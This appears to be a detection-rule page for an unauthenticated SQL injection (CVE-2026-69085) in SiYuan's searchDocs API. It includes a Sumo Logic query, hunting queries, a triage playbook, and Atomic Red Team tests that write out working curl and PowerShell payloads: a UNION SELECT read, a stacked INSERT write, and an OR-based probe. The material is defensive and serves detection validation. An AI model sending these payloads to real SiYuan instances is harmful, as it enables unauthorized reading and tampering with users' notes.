CVE-2026-69085 Sumo Logic CSE · Sumo

Detect SiYuan Unauthenticated SQL Injection in searchDocs (CVE-2026-69085) in Sumo Logic CSE

Detects exploitation of CVE-2026-69085, an unauthenticated SQL injection in SiYuan's kernel searchDocs endpoint (/api/filetree/searchDocs) reachable in publish mode. The keyword parameter is interpolated into a SQL statement without escaping, allowing statement stacking against the embedded SQLite database for cross-notebook read and write. CVSS 10.0 (CWE-89), public PoC. Detection focuses on HTTP requests to the searchDocs API carrying SQL injection and statement-stacking payloads in the keyword field, and on anomalous database writes from the SiYuan kernel.

MITRE ATT&CK

Tactic
Initial Access Collection Impact

Sumo Detection Query

Sumo Logic CSE (Sumo)
sql
_sourceCategory=*web* OR _sourceCategory=*proxy*
| where _raw matches "*searchDocs*"
| parse regex "(?<method>\\w+)\\s+(?<url>\\S+)" nodrop
| where toLowerCase(_raw) matches /union\s+select|';|--\s|attach database|insert into|drop table|pragma |' or /
| count by src_ip, url, method
| sort by _count
critical severity medium confidence

Sumo Logic search matching SiYuan searchDocs requests containing SQL injection / stacked-statement tokens in raw web or proxy logs.

Data Sources

Web server logsReverse proxy logs

Required Tables

_sourceCategory=web_sourceCategory=proxy

False Positives & Tuning

  • Note searches that legitimately include SQL keywords.
  • Scanner traffic from authorized assessments.
  • Synthetic monitoring requests.

Other platforms for CVE-2026-69085


Testing Methodology

Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1searchDocs UNION SELECT read probe

    Expected signal: Web/proxy access log entry and SiYuan kernel log showing a POST to /api/filetree/searchDocs containing 'UNION SELECT'.

  2. Test 2searchDocs statement-stacking write

    Expected signal: Access log entry with ';' and INSERT INTO in the request body; SiYuan database file modification timestamp updated.

  3. Test 3searchDocs boolean/comment injection probe

    Expected signal: HTTP request telemetry showing POST to searchDocs containing "' OR '" and "-- " sequences.


Response Playbook

Triage

  1. Confirm the targeted host runs SiYuan kernel (github.com/siyuan-note/siyuan/kernel) and whether it is exposed in publish mode; check the version against the fixed build 0.0.0-20260721043339-eef10568384e (v3.7.3).
  2. Extract the full keyword parameter from the matched request and decode it; determine whether it contains stacked statements (';'), write operations (INSERT/UPDATE/DROP), or data-exfiltration UNION SELECTs.
  3. Identify the source IP's authentication state — because the endpoint is unauthenticated in publish mode, treat any injection payload as unauthorized regardless of session.
  4. Correlate the source IP against prior access logs to establish whether this is a one-off probe or sustained exploitation, and whether multiple notebooks were accessed.

Containment

  1. Block the offending source IP(s) at the WAF/reverse proxy and restrict the SiYuan publish endpoint to trusted networks or behind authentication.
  2. Take the exposed SiYuan instance offline or disable publish mode until it is upgraded to v3.7.3 / build eef10568384e or later.

Evidence Collection

  1. Preserve web/proxy access logs, WAF logs, and the SiYuan kernel logs covering the request window, including full request bodies.
  2. Snapshot the SiYuan SQLite database files (workspace data/siyuan storage) to capture any attacker-induced writes before remediation.
  3. Capture the process list and open file handles of the kernel process to document database access during the incident.

Escalation Criteria

  • !Escalate to IR if payloads include write/stacked statements (INSERT/UPDATE/DROP or ';') indicating cross-notebook modification rather than read-only probing.
  • !Escalate if evidence shows successful data exfiltration across notebooks (UNION SELECT returning content) or if the instance held sensitive/regulated note data.

Investigation Guide

Related Techniques

Forensic Artifacts

  • >SiYuan kernel access/error logs
  • >Web/reverse-proxy access logs with request bodies
  • >SiYuan workspace SQLite database files and their modification timestamps
  • >WAF/IPS alert records for the searchDocs endpoint

Tuning Guidance

Baseline legitimate searchDocs traffic from internal users to learn normal keyword content; benign note searches may contain isolated SQL keywords, so prioritize alerts that include stacking tokens (';'), comment sequences (--, /*), or write verbs over single keyword matches. Where possible, restrict detection to instances actually running in publish mode and scope by the SiYuan listening port (default 6806) to reduce noise.


Hunting Queries

Hunt for repeated SQL-injection attempts against the searchDocs endpoint grouped by source IP over time.

Hunting — KQL
kql
CommonSecurityLog | where RequestURL has "searchDocs" | extend b=tolower(AdditionalExtensions) | where b has_any("union select","';","attach database","pragma") | summarize count() by SourceIP, bin(TimeGenerated,1h)
Hunting — SPL
spl
index=web uri="*searchDocs*" | eval p=lower(coalesce(form_data,request_body,uri_query)) | where match(p,"(?i)union\s+select|';|attach database|pragma") | stats count by src_ip

Atomic Red Team Tests

Test 1 searchDocs UNION SELECT read probe
linux

Sends an unauthenticated POST to the SiYuan searchDocs API with a UNION SELECT payload in the keyword field to test cross-notebook read.

Command

bash
curl -s -X POST http://localhost:6806/api/filetree/searchDocs -H 'Content-Type: application/json' -d '{"k":"test\u0027 UNION SELECT name,content FROM blocks -- "}'

Cleanup

bash
echo 'No persistent change from read-only probe; no cleanup required'

Expected Telemetry

Web/proxy access log entry and SiYuan kernel log showing a POST to /api/filetree/searchDocs containing 'UNION SELECT'.

Expected Detection

KQL/SPL/EQL rules match on the UNION SELECT token in the request body to searchDocs.

Test 2 searchDocs statement-stacking write
linux

Attempts a stacked statement in the keyword field to write to the embedded SQLite database.

Command

bash
curl -s -X POST http://localhost:6806/api/filetree/searchDocs -H 'Content-Type: application/json' -d '{"k":"x\u0027; INSERT INTO blocks(id,content) VALUES(\u0027poc\u0027,\u0027pwned\u0027); -- "}'

Cleanup

bash
sqlite3 "$HOME/.config/siyuan/temp/siyuan.db" "DELETE FROM blocks WHERE id='poc';" 2>/dev/null || true

Expected Telemetry

Access log entry with ';' and INSERT INTO in the request body; SiYuan database file modification timestamp updated.

Expected Detection

Detection rules match on the stacked-statement and INSERT INTO tokens, raising a high-severity write-exploitation alert.

Test 3 searchDocs boolean/comment injection probe
windows

Sends a classic boolean-OR with comment payload to the keyword parameter to fingerprint injectability.

Command

powershell
powershell -Command "Invoke-WebRequest -Uri http://localhost:6806/api/filetree/searchDocs -Method POST -ContentType 'application/json' -Body '{\"k\":\"a'' OR ''1''=''1'' -- \"}'"

Cleanup

powershell
Write-Output 'No persistent change; no cleanup required'

Expected Telemetry

HTTP request telemetry showing POST to searchDocs containing "' OR '" and "-- " sequences.

Expected Detection

Detection rules match on the boolean-OR and comment tokens in the searchDocs request.

Related Detections